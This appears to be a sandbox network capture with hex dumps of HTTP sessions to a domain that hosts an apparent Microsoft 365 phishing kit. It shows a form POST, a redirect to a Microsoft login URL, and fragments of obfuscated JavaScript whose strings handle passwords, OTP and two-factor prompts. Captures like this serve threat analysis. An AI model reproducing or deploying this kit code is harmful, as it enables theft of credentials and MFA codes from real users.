                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:10 UTC669INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:10 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="klzLXAGm0iHdZcT6MtYiHXXpKNbL5RnuklNxCudj1JkeYERYfD8sQ8Od4hrM5uv220"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vtkvTozyhPNlSu7Ry2xLNtivJWDqwNdWc5q%2FaAfoPpdA9UV85tPL91a9kTfGCTIf4ZiJg37ltG9yORtWgyDZ6PtTKCLKuTXJwnNbz3kepNub%2BQ%2BPLaUkdxPGaWXzxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65524dd072a4-EWR
                                                          2024-08-27 22:11:10 UTC700INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                          Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                          2024-08-27 22:11:10 UTC1171INData Raw: 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c
                                                          Data Ascii: 445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-col
                                                          2024-08-27 22:11:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          53192.168.2.449828188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:09 UTC1541OUTGET /ijnd8sg6QezUuY8NkwAQx6Mva2UqiWIRuKitmhbhPvV0dW8953IaxnO5zyk4DAWXKxNh96jT7SddDXEWlab230 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:10 UTC681INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:10 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 1400
                                                          Connection: close
                                                          Content-Disposition: inline; filename="ijnd8sg6QezUuY8NkwAQx6Mva2UqiWIRuKitmhbhPvV0dW8953IaxnO5zyk4DAWXKxNh96jT7SddDXEWlab230"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTIKFrkjU5QgROXqkO1X11kYMhp2eWGjHazlWtWTf3j0pIP0TG40bd8Zft7GCbjWFO%2F%2B2zF406Fg4cuvVM%2BKRt2Kxz9Gl6HCSJydSE7%2FhMo0CbMykxeXMNFI1EaTTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65524bdb8c3c-EWR
                                                          2024-08-27 22:11:10 UTC688INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                          Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                          2024-08-27 22:11:10 UTC712INData Raw: 69 d1 f4 00 ee 67 61 63 00 e3 31 43 e6 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a
                                                          Data Ascii: igac1CIte~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          54192.168.2.449829188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:09 UTC1582OUTPOST /lvytc1gAYeGHFHs4NJuMNMax70PlgNRGw39kizb HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          Content-Length: 57
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Accept: */*
                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                          X-Requested-With: XMLHttpRequest
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Origin: https://kpl2.r04ar2.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:09 UTC57OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 5a 58 25 32 42 37 4e 42 59 44 63 64 25 32 46 42 33 71 30 79 74 34 72 34 33 77 25 33 44 25 33 44 26 74 79 70 65 3d 34 26 61 70 70 6e 75 6d 3d 31
                                                          Data Ascii: pagelink=ZX%2B7NBYDcd%2FB3q0yt4r43w%3D%3D&type=4&appnum=1
                                                          2024-08-27 22:11:10 UTC997INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:10 GMT
                                                          Content-Type: application/json
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: no-cache, private
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DrFglhVyTO8XMSxCIvHj6qCkv2zTukIw5JZwwaoWb8TRBoH%2FXHSxJPzSbeMkoNa0LwL4wnu3E7bQ8k9hfA0DkNPsyLpkg4%2F78A6voz%2FtGYf4jeP18r1UqYdDEJua4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; expires=Wed, 28-Aug-2024 00:11:10 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                          2024-08-27 22:11:10 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 46 7a 62 6b 6c 68 63 47 56 6d 4d 47 6b 72 4d 6b 35 48 59 31 4a 31 61 6b 31 6b 57 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 64 32 45 35 4c 7a 56 45 53 56 55 33 64 6d 64 77 63 47 4e 70 4d 33 5a 48 5a 45 68 6c 55 46 42 49 4f 55 5a 4b 62 6a 42 57 5a 55 52 77 4f 47 4e 4b 56 6d 4a 4a 51 58 42 77 62 55 4e 61 53 6e 55 79 5a 48 5a 75 63 45 45 35 56 56 51 32 55 6c 49 34 62 47 77 72 4f 44 64 44 4e 45 5a 4f 61 48 5a 44 54 55 6b 33 4e 55 51 78 52 45 31 6e 4b 32 74 6b 56 6a 52 55 52 6b 31 5a 4c 30 46 33 55 31 51 31 4e 33 68 53 59 30 67 31 59 55 56 69 5a 46 42 53 5a 56 68 76 63 30 78 6d 4f 55 4e 73 62 31 64 47 4e 47 31 68 64 6e 51 32 65 6a 49
                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejI
                                                          2024-08-27 22:11:10 UTC97INData Raw: 35 62 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 5c 2f 63 6f 6d 6d 6f 6e 5c 2f 53 41 53 5c 2f 50 72 6f 63 65 73 73 41 75 74 68 22 7d 0d 0a
                                                          Data Ascii: 5b{"expired":0,"redirecturl":"https:\/\/login.microsoftonline.com\/common\/SAS\/ProcessAuth"}
                                                          2024-08-27 22:11:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          55192.168.2.449839188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:10 UTC1103OUTGET /34u2dqhNgiTTAmhQJRfAlijwjGO22rrieg8N89109 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:11 UTC653INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: application/javascript
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="34u2dqhNgiTTAmhQJRfAlijwjGO22rrieg8N89109"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eW2fxd3EwgBs%2Bw6FcB6z9axqfZSXsT9o2fT735S0sLol2cUVhFWzIm1uUAODQuR8Cs4HIKDfSWiPfZplV%2FeWgqSq41dBeUiEAX9X1UsHnPZbchSkg1Nc2%2BeX5GVXJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f6558bddb8c1e-EWR
                                                          2024-08-27 22:11:11 UTC716INData Raw: 33 35 66 38 0d 0a 63 6f 6e 73 74 20 5f 30 78 31 37 37 30 65 36 3d 5f 30 78 34 64 34 65 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 64 34 62 39 36 2c 5f 30 78 34 64 61 64 61 64 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 65 31 35 61 3d 5f 30 78 34 64 34 65 2c 5f 30 78 33 39 39 31 36 30 3d 5f 30 78 34 64 34 62 39 36 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 32 65 61 37 61 61 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 61 65 31 35 61 28 30 78 31 34 37 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 61 65 31 35 61 28 30 78 31 64 63 29 29 2f 30 78 32 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 61 65 31 35 61 28 30 78 31 32 61 29 29 2f 30 78 33 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 61 65 31 35 61 28 30 78
                                                          Data Ascii: 35f8const _0x1770e6=_0x4d4e;(function(_0x4d4b96,_0x4dadad){const _0x3ae15a=_0x4d4e,_0x399160=_0x4d4b96();while(!![]){try{const _0x2ea7aa=-parseInt(_0x3ae15a(0x147))/0x1+parseInt(_0x3ae15a(0x1dc))/0x2+-parseInt(_0x3ae15a(0x12a))/0x3+parseInt(_0x3ae15a(0x
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 73 69 74 65 64 61 6c 72 65 61 64 79 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 62 35 33 28 29 7b 63 6f 6e 73 74 20 5f 30 78 63 30 37 63 30 35 3d 5b 27 23 62 74 6e 5f 6e 65 78 74 27 2c 27 6c 61 72 67 65 49 63 6f 6e 27 2c 27 6c 6f 67 6f 27 2c 27 64 61 74 61 2d 69 64 27 2c 27 73 63 72 69 70 74 27 2c 27 61 6e 69 6d 61 74 69 6f 6e 27 2c 27 75 6e 73 65 74 27 2c 27 23 62 74 6e 5f 62 61 63 6b 27 2c 27 64 69 73 70 6c 61 79 27 2c 27 61 70 70 65 6e 64 43 68 69 6c 64 27 2c 27 6f 74 70 64 65 73 63 27 2c 27 76 61 6c 69 64 5c 78 32 30 65 6d 61 69 6c 5c 78 32 30 6f 74 70 27 2c 27 6d 65 74 68 6f 64 69 64 27 2c 27 65 72 72 6f 72 5f 32 66 61 27 2c 27 69 41 64 64 69 74 69 6f 6e 61 6c 50 72 6f 6f 66 49 6e 66 6f 27 2c 27 50 68 6f 6e 65 41 70 70 4f 54 50 5f 4c 69
                                                          Data Ascii: sitedalready=null;function _0x3b53(){const _0xc07c05=['#btn_next','largeIcon','logo','data-id','script','animation','unset','#btn_back','display','appendChild','otpdesc','valid\x20email\x20otp','methodid','error_2fa','iAdditionalProofInfo','PhoneAppOTP_Li
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 78 32 30 5c 78 32 30 5c 78 32 30 27 2c 27 6f 74 70 27 2c 27 53 68 6f 77 27 2c 27 70 61 72 73 65 27 2c 27 2e 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 27 2c 27 64 79 6e 61 6d 69 63 2d 73 74 79 6c 65 27 2c 27 4e 6f 5c 78 32 30 61 63 63 6f 75 6e 74 3f 27 2c 27 42 61 63 6b 27 2c 27 65 6d 61 69 6c 27 2c 27 63 75 73 74 6f 6d 73 6c 61 73 68 73 74 72 27 2c 27 73 65 63 74 69 6f 6e 5f 61 75 74 68 63 61 6c 6c 27 2c 27 74 72 79 61 67 61 69 6e 6c 61 74 65 72 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 27 2c 27 73 65 6c 65 63 74 70 72 6f 74 65 63 74 6f 70 74 69 6f 6e 28 74 68 69 73 29 27 2c 27 6f 75 74 6c 6f 6f 6b 45 6d 61 69 6c 4c 61 62 65 6c 27 2c 27 45 72 72 6f 72 3a 27 2c 27 70 68 6f 6e 65 27 2c 27 54 77 6f 57 61 79 56 6f 69 63 65 4d 6f 62 69 6c 65 27
                                                          Data Ascii: x20\x20\x20','otp','Show','parse','.sectioncontent','dynamic-style','No\x20account?','Back','email','customslashstr','section_authcall','tryagainlater','background-color','selectprotectoption(this)','outlookEmailLabel','Error:','phone','TwoWayVoiceMobile'
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 67 61 69 6e 5c 78 32 30 73 68 6f 72 74 6c 79 2e 3c 2f 70 3e 27 2c 27 6c 69 73 74 69 74 65 6d 27 2c 27 32 66 61 5c 78 32 30 69 73 5c 78 32 30 6f 66 66 5c 78 32 30 6e 65 77 77 65 62 73 69 74 65 27 2c 27 72 61 64 69 6f 27 2c 27 73 65 63 74 69 6f 6e 5f 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 5f 61 64 66 73 27 2c 27 70 72 6f 6f 66 44 69 76 27 2c 27 63 6c 61 73 73 4c 69 73 74 27 2c 27 6c 65 74 73 5c 78 32 30 74 72 79 5c 78 32 30 73 6f 6d 65 74 68 69 6e 67 5c 78 32 30 65 6c 73 65 5c 78 32 30 6f 72 5c 78 32 30 63 6f 6d 65 5c 78 32 30 62 61 63 6b 27 2c 27 73 65 63 74 69 6f 6e 73 27 2c 27 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 27 2c 27 69 45 6e 74 65 72 50 72 6f 6f 66 44 65 73 63 27 2c 27 66 61 64 65 69 6e 66 6f 72 6d 5c 78 32 30 31 73 5c 78 32 30
                                                          Data Ascii: gain\x20shortly.</p>','listitem','2fa\x20is\x20off\x20newwebsite','radio','section_multipleaccounts_adfs','proofDiv','classList','lets\x20try\x20something\x20else\x20or\x20come\x20back','sections','addEventListener','iEnterProofDesc','fadeinform\x201s\x20
